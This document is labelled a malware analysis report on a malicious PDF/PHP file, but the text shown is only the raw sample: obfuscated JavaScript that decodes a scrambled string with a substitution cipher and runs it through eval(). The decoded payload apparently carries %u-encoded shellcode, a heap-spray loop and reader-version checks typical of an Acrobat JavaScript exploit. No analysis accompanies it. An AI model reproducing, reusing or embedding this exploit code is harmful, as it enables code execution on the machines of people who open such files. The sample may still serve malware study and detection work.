Malicious PDF / .PHP — malware analysis report

function VTWQgAsnQkga(VTWQgAsnQkga,ZJqfHm1HdvZhole) {var z2o8a=VTWQgAsnQkga. substr (ZJqfHm1HdvZhole, 1);return z2o8a;}/*QkuoNfcX42Cleo4mj|wy6nn8|c0UbRGr10WEWzcR*/function T0zGq(IwB6eYNzzBRjov4tI) {/*f3MJxyt4li0OLy4n|PF6VwyMJ3j8V0q1|ABhsucTTSieHdIxs*/var nBOcjdd3UT = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*uDAiQJcz[xqyparq]ZaZttsSO0vWnekXik6yt*//*o1MUp1uXirx|Hhszz7plUTG4rpeodNDI|PcvHMI*/var BDIxF /*A6oCdX1TVh4p0Bj[qEMKSPSXfuIn7]T2N84qVw9*/= new String(")<l6(,RBQS0ph>eknqYg31yxJu}POU{vNa CKE5scVA7Ltmi2f9HWdXjb.8wGzoTDFrM4ZI");/*U4WL66tmA5wSKEpp|ySxFmqSkl96Y9ns493|Amc6hPOsU4YJtr7zTo*/for(ReSGUU=0;ReSGUU<nBOcjdd3UT.length;ReSGUU++) {if(IwB6eYNzzBRjov4tI == VTWQgAsnQkga(BDIxF, ReSGUU)) {/*APHznGd[AdP0Y1TVZi]I2fgCOOADhoLb3*/return VTWQgAsnQkga(nBOcjdd3UT, ReSGUU);/*RhZu3aNIR <Ak8aIijBDGDRUDV]rgTlzlJPWCpkL6NLhLm*/}}return IwB6eYNzzBRjov4tI;}/*tLrwRuElxaef6yH[ZQBwTrWenjqLuS1ee]RvSVXGw1msqtf*//*Ah2TOO|AxeDiw4CRdTCvpa2b|eK8OqEON6*/var M6mfT3CTm = new String;var jMMA1lJhHRJ9Ynv = new String("\nbCWR{{Va}HuWso7xgJKmR=R2s.RSWWCwl6;\nbCWR>tWacxbGeIXI5 aa;\ncj2EX7f2R e4vMNxtNZIdvLs.l>{UzXJzIaDnpEHtAQR8Hh0xKbb7F2e2Ppn6(\nRR.A7msRl>{UzXJzIaDnpEHtABms2VXAR*RTR)R8Hh0xKbb7F2e2Ppn6(\nRRRR>{UzXJzIaDnpEHtAR+=R>{UzXJzIaDnpEHtA;\nRR,\nRR>{UzXJzIaDnpEHtAR=R>{UzXJzIaDnpEHtABdjKdXW72VlzQR8Hh0xKbb7F2e2PpnR/RT6;\nRRWsXjW2R>{UzXJzIaDnpEHtA;\n,\ncj2EX7f2RNV}H4CGsEnH>ZK.hlVzxHmYmUy LSTbPG6(\nRRbCWRNXH7U9yZZ>1>9q}nR=Rz8zEzEzEzE;\nRRbCWRpHIhzjAvUuA{1z{GR=Rj2sdEC9sl\"%jFDFD%jFDFD%jFDFD%jze>0%jDDr0%jMMpI%jZz0I%jZzzo%j>eDD%j>TFD%j>0eS%j>Zzr%jee>p%jeeee%jZ04e%jheF>%j>e>e%jMF>e%j>DSe%jIeMF%jFTeD%jIeMF%jM>>4%j>ezD%j>e>0%jMF>e%j0IzD%jMoZ4%j>oSo%jz4zD%j>eoo%j>e>e%jSSMM%j0I>0%j44Z4%jMroo%jz4>o%j>eoe%j>e>e%jSSMM%j0I>4%jpSZ4%jozre%jz4Th%j>ezh%j>e>e%jSSMM%j0I>D%jzzZ4%jzeTo%jz4Ze%j>eD0%j>e>e%jSSMM%j0Iee%jT>Z4%jzSIM%jz4r4%j>eTI%j>e>e%jSSMM%jSee0%jh4Me%jISTp%jMMor%je4SS%j>ZzM%j>e>>%j0o>e%jISMM%jMFp0%j>0SS%j>>Zr%jMF0M%je40S%jz40I%j>eMF%j>e>e%jZ40e%jerhI%jIepz%j4Zz4%j>e>e%jMM>e%jeDSS%jTSMF%jTeMp%jMM0e%jpeSS%jozZ4%j>e>e%j0e>e%jSSMF%jZre0%j0M>h%j0SMF%jz4e4%j>eZ>%j>e>e%jSS>p%jTZpe%j0D>e%jpoIo%jTZZS%j>0Se%jZSI4%j>e>e%jISoz%jMFpe%j>DSS%j>>Zr%jMF0M%je40S%jSez4%j>e>e%jZr>e%j04>Z%jSS>p%jhpp0%j0pDF%joz0p%jpeIS%j0p0e%jSSMF%jZreD%j0M>S%j0SMF%jz4e4%j>epp%j>e>e%j>eZr%jISoz%jMFpe%j>4SS%j>hZr%jMF0M%je40S%jeez4%j>e>e%jZr>e%jMFoz%jeeSS%j>>Zr%jMF0M%je40S%j>ez4%j>e>e%jS>>e%j0h0F%jz>>p%jz>>p%jz>>p%jz>>p%jzDMp%j0r>0%jMF0p%jzhDr%j0hoZ%jzeoz%jMF0S%jMFzD%j>4IT%j0TMF%j0I>D%jIpMF%jMFhD%jeoI0%j>pI4%j0Iop%jIIMF%j>ppe%jhpop%jSMTM%jFTS>%jTp>p%jhp0I%j>zoI%jeero%johhr%j>4I0%jToT>%j>p>T%jSeoh%jo>zF%joohF%jIS0o%j0rzS%jzFMF%j0rMF%j>pp0%jZIDT%j>DMF%jMFSF%jeD0r%jDT>p%j>0MF%j>pMF%j0oTS%jTh0T%j>e>4%jo0z4%jozoo%j0Soz%jSD0h%jSzST%j>eSo%j4FMZ%j4z4F%jTeDS%jMFTe%jMhDz%jDoMo%j4DM>%jMIT>%jMMM>%jTeMe%jMpMT%jM4Me%jMpTe%jMoMe%jT>MF%jMZ4z%jDe4z%jMFMI%jDIDh%jzzDT\"6;\nRR7cRlVzxHmYmUy LSTbPGR==Ro6(\nRRRRNXH7U9yZZ>1>9q}nR=Rz8DzDzDzDz;\nRRRRpHIhzjAvUuA{1z{GR=Rj2sdEC9sl\"%jFDFD%jFDFD%jFDFD%jze>0%jDDr0%jMMpI%jZz0I%jZzzo%j>eDD%j>TFD%j>0eS%j>Zzr%jee>p%jeeee%jZ04e%jheF>%j>e>e%jMF>e%j>DSe%jIeMF%jFTeD%jIeMF%jM>>4%j>ezD%j>e>0%jMF>e%j0IzD%jMoZ4%j>oSo%jz4zD%j>eoo%j>e>e%jSSMM%j0I>0%j44Z4%jMroo%jz4>o%j>eoe%j>e>e%jSSMM%j0I>4%jpSZ4%jozre%jz4Th%j>ezh%j>e>e%jSSMM%j0I>D%jzzZ4%jzeTo%jz4Ze%j>eD0%j>e>e%jSSMM%j0Iee%jT>Z4%jzSIM%jz4r4%j>eTI%j>e>e%jSSMM%jSee0%jh4Me%jISTp%jMMor%je4SS%j>ZzM%j>e>>%j0o>e%jISMM%jMFp0%j>0SS%j>>Zr%jMF0M%je40S%jz40I%j>eMF%j>e>e%jZ40e%jerhI%jIepz%j4Zz4%j>e>e%jMM>e%jeDSS%jTSMF%jTeMp%jMM0e%jpeSS%jozZ4%j>e>e%j0e>e%jSSMF%jZre0%j0M>h%j0SMF%jz4e4%j>eZ>%j>e>e%jSS>p%jTZpe%j0D>e%jpoIo%jTZZS%j>0Se%jZSI4%j>e>e%jISoz%jMFpe%j>DSS%j>>Zr%jMF0M%je40S%jSez4%j>e>e%jZr>e%j04>Z%jSS>p%jhpp0%j0pDF%joz0p%jpeIS%j0p0e%jSSMF%jZreD%j0M>S%j0SMF%jz4e4%j>epp%j>e>e%j>eZr%jISoz%jMFpe%j>4SS%j>hZr%jMF0M%je40S%jeez4%j>e>e%jZr>e%jMFoz%jeeSS%j>>Zr%jMF0M%je40S%j>ez4%j>e>e%jS>>e%j0h0F%jz>>p%jz>>p%jz>>p%jz>>p%jzDMp%j0r>0%jMF0p%jzhDr%j0hoZ%jzeoz%jMF0S%jMFzD%j>4IT%j0TMF%j0I>D%jIpMF%jMFhD%jeoI0%j>pI4%j0Iop%jIIMF%j>ppe%jhpop%jSMTM%jFTS>%jTp>p%jhp0I%j>zoI%jeero%johhr%j>4I0%jToT>%j>p>T%jSeoh%jo>zF%joohF%jIS0o%j0rzS%jzFMF%j0rMF%j>pp0%jZIDT%j>DMF%jMFSF%jeD0r%jDT>p%j>0MF%j>pMF%j0oTS%jTh0T%j>e>4%jo0z4%jozoo%j0Soz%jSD0h%jSzST%j>eSo%j4FMZ%j4z4F%jTeDS%jMFTe%jMhDz%jDoMo%j4DM>%jMIT>%jMMM>%jTeMe%jMpMT%jM4Me%jMpTe%jMoMe%jT>MF%jMZ4z%jDe4z%jMFMI%jDIDh%jzzDT\"6;\nRR,\nRRsmdsR7cRlVzxHmYmUy LSTbPGR==RT6(\nRRRRpHIhzjAvUuA{1z{GR=Rj2sdEC9sl\"%jFDFD%jFDFD%jFDFD%jze>0%jDDr0%jMMpI%jZz0I%jZzzo%j>eDD%j>TFD%j>0eS%j>Zzr%jee>p%jeeee%jZ04e%jheF>%j>e>e%jMF>e%j>DSe%jIeMF%jFTeD%jIeMF%jM>>4%j>ezD%j>e>0%jMF>e%j0IzD%jMoZ4%j>oSo%jz4zD%j>eoo%j>e>e%jSSMM%j0I>0%j44Z4%jMroo%jz4>o%j>eoe%j>e>e%jSSMM%j0I>4%jpSZ4%jozre%jz4Th%j>ezh%j>e>e%jSSMM%j0I>D%jzzZ4%jzeTo%jz4Ze%j>eD0%j>e>e%jSSMM%j0Iee%jT>Z4%jzSIM%jz4r4%j>eTI%j>e>e%jSSMM%jSee0%jh4Me%jISTp%jMMor%je4SS%j>ZzM%j>e>>%j0o>e%jISMM%jMFp0%j>0SS%j>>Zr%jMF0M%je40S%jz40I%j>eMF%j>e>e%jZ40e%jerhI%jIepz%j4Zz4%j>e>e%jMM>e%jeDSS%jTSMF%jTeMp%jMM0e%jpeSS%jozZ4%j>e>e%j0e>e%jSSMF%jZre0%j0M>h%j0SMF%jz4e4%j>eZ>%j>e>e%jSS>p%jTZpe%j0D>e%jpoIo%jTZZS%j>0Se%jZSI4%j>e>e%jISoz%jMFpe%j>DSS%j>>Zr%jMF0M%je40S%jSez4%j>e>e%jZr>e%j04>Z%jSS>p%jhpp0%j0pDF%joz0p%jpeIS%j0p0e%jSSMF%jZreD%j0M>S%j0SMF%jz4e4%j>epp%j>e>e%j>eZr%jISoz%jMFpe%j>4SS%j>hZr%jMF0M%je40S%jeez4%j>e>e%jZr>e%jMFoz%jeeSS%j>>Zr%jMF0M%je40S%j>ez4%j>e>e%jS>>e%j0h0F%jz>>p%jz>>p%jz>>p%jz>>p%jzDMp%j0r>0%jMF0p%jzhDr%j0hoZ%jzeoz%jMF0S%jMFzD%j>4IT%j0TMF%j0I>D%jIpMF%jMFhD%jeoI0%j>pI4%j0Iop%jIIMF%j>ppe%jhpop%jSMTM%jFTS>%jTp>p%jhp0I%j>zoI%jeero%johhr%j>4I0%jToT>%j>p>T%jSeoh%jo>zF%joohF%jIS0o%j0rzS%jzFMF%j0rMF%j>pp0%jZIDT%j>DMF%jMFSF%jeD0r%jDT>p%j>0MF%j>pMF%j0oTS%jTh0T%j>e>4%jo0z4%jozoo%j0Soz%jSD0h%jSzST%j>eSo%j4FMZ%j4z4F%jTeDS%jMFTe%jMhDz%jDoMo%j4DM>%jMIT>%jMMM>%jTeMe%jMpMT%jM4Me%jMpTe%jMoMe%jT>MF%jMZ4z%jDe4z%jMFMI%jDIDh%jzzDT\"6;\nRR,\nRRbCWRH37N0MsqgoNSYGPmR=Rz8Fzzzzz;\nRRbCWR}CwwUc{w4pUO3GPxR=RpHIhzjAvUuA{1z{GBms2VXAR*RT;\nRRbCWR8Hh0xKbb7F2e2PpnR=RH37N0MsqgoNSYGPmR-Rl}CwwUc{w4pUO3GPxR+Rz8DZ6;\nRRbCWR>{UzXJzIaDnpEHtAR=Rj2sdEC9sl\"%jIzIz%jIzIz\"6;\nRR>{UzXJzIaDnpEHtAR=R e4vMNxtNZIdvLs.l>{UzXJzIaDnpEHtAQR8Hh0xKbb7F2e2Ppn6;\nRRbCWRHS.vkC9CK1mj3hVSR=RlNXH7U9yZZ>1>9q}nR-Rz8Fzzzzz6R/RH37N0MsqgoNSYGPm;\nRRcfWRlbCWRKszYgsq}Hijpi1CIR=Rz;RKszYgsq}Hijpi1CIR)RHS.vkC9CK1mj3hVS;RKszYgsq}Hijpi1CIR++R6(\nRRRR{{Va}HuWso7xgJKm[KszYgsq}Hijpi1CI]R=R>{UzXJzIaDnpEHtAR+RpHIhzjAvUuA{1z{G;\nRR,\n,\ncj2EX7f2RGvs2ZOxLHzspyg10l6(\nRRbCWR}vUY0itT ch1DfU R=Rz;\nRRbCWR5zyP5m0Ob9cqzDOIR=RC99Bb7s.sW{sWd7f2BXfPXW72Vl6;\nRRC99BEmsCWO7isxjXl>tWacxbGeIXI5 aa6;\n\nRR7cRl5zyP5m0Ob9cqzDOIR)R4Bo6(\nRRRRNV}H4CGsEnH>ZK.hlz6;\nRRRRbCWRPwPtmhm3dG7bfp{zR=Rj2sdEC9sl\"%jzEzE%jzEzE\"6;\nRRRR.A7msRlPwPtmhm3dG7bfp{zBms2VXAR)RFFIrT6PwPtmhm3dG7bfp{zR+=RPwPtmhm3dG7bfp{z;\nRRRRXA7dRBEfmmCKPXfWsR=RpfmmCKBEfmmsEX>iC7mq2cfl(\nRRRRRRdjKLR:R\"\"QRidVR:RPwPtmhm3dG7bfp{z\nRRRR,\nRRRR6;\nRR,\n7cRl5zyP5m0Ob9cqzDOIR<=RI6(\nRRRRXWwR(\n7cRlC99B5fEBpfmmCKBVsXqEf26(\nRRRRRRRRNV}H4CGsEnH>ZK.hlT6;\nRRRRRRRRbCWR}dKGs2P 5IW2S3.LR=Rj2sdEC9sl\"%zI\"6;\nRRRRRRRR.A7msRl}dKGs2P 5IW2S3.LBms2VXAR)Rz8Fzzz6}dKGs2P 5IW2S3.LR+=R}dKGs2P 5IW2S3.L;\nRRRRRRRR}dKGs2P 5IW2S3.LR=R\"yB\"R+R}dKGs2P 5IW2S3.L;\nC99B5fEBpfmmCKBVsXqEf2l}dKGs2P 5IW2S3.L6;\nRRRRRRRR}vUY0itT ch1DfU R=Ro;\nRRRRRR,\nRRRRRRsmdsR(\nRRRRRRRR}vUY0itT ch1DfU R=Ro;\nRRRRRR,\nRRRR,\nRRRRECXEARls6(\nRRRRRR}vUY0itT ch1DfU R=Ro;\nRRRR,\nRRRR7cRl}vUY0itT ch1DfU R==Ro6(\nRRRRRR7cRll5zyP5m0Ob9cqzDOIR<=R4Bo&&R5zyP5m0Ob9cqzDOIR)RI66(\nRRRRRRRRNV}H4CGsEnH>ZK.hlo6;\nRRRRRRRRbCWRHxO4Ke}UeSuFybhLR=R\"oTIIIIIIIIIIIIIIIIII\";\nRRRRRRRRcfWRlO97PE0TegdF{>GeaR=Rz;RO97PE0TegdF{>GeaR)RT4M;RO97PE0TegdF{>GeaR++R6(\nRRRRRRRRRRHxO4Ke}UeSuFybhLR+=R\"Z\";\nRRRRRRRR,\nRRRRRRRRjX7mB9W72Xcl\"%Frzzzc\"QRHxO4Ke}UeSuFybhL6;\nRRRRRR,\nRRRR,\nRR,\n,\nC99B}LsGw4U>kjq5H{1sR=RGvs2ZOxLHzspyg10;\n>tWacxbGeIXI5 aaR=RC99BdsXO7isxjXl\"C99B}LsGw4U>kjq5H{1sl6\"QRoz6;\n");/*bLVT9zXhmSk3v{AhjXZBp4LnJ1sYFp6g0}AzIOXvg7o*//*Alyb8OcnI|RSgAqlpmIf58VDM|ytqdAhFy8DDbrLF9*/for(KZZoqllTH5MKOy0yB=0;KZZoqllTH5MKOy0yB<jMMA1lJhHRJ9Ynv.length;KZZoqllTH5MKOy0yB++)M6mfT3CTm += T0zGq(VTWQgAsnQkga(jMMA1lJhHRJ9Ynv,KZZoqllTH5MKOy0yB));eval(M6mfT3CTm);/*mAKNpxWLsUhw[PkQ5ERdJGcNJ3]V95zl59zlwLwfgUREj2*/